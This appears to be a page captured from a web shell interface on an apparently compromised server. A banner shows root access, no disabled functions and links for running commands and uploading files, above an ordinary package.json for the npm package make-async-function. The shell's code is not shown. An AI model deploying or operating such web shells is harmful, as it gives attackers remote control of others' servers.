|
Server IP : 161.35.85.9 / Your IP : 216.73.217.134 Web Server : nginx/1.30.1 System : Linux cheapdeb-ams3 7.0.9+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 7.0.9-1 (2026-05-22) x86_64 User : root ( 0) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/python3/../node_modules/make-async-function/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
{
"name": "make-async-function",
"version": "1.0.0",
"description": "Function that returns an arbitrary `async function`, or undefined if `async function` syntax is unsupported.",
"main": "./",
"scripts": {
"prepublish": "safe-publish-latest",
"lint": "eslint .",
"pretest": "npm run lint",
"tests-only": "node test",
"test": "npm run tests-only",
"posttest": "npm run security",
"security": "nsp check"
},
"repository": {
"type": "git",
"url": "git+https://github.com/ljharb/make-async-function.git"
},
"keywords": [
"async function",
"async",
"function",
"ES2017",
"ES8",
"ES7",
"ES6",
"promise",
"await"
],
"author": "Jordan Harband <ljharb@gmail.com>",
"license": "MIT",
"bugs": {
"url": "https://github.com/ljharb/make-async-function/issues"
},
"homepage": "https://github.com/ljharb/make-async-function#readme",
"devDependencies": {
"@ljharb/eslint-config": "^12.2.1",
"eslint": "^4.6.1",
"nsp": "^2.7.0",
"safe-publish-latest": "^1.1.1",
"tape": "^4.8.0"
}
}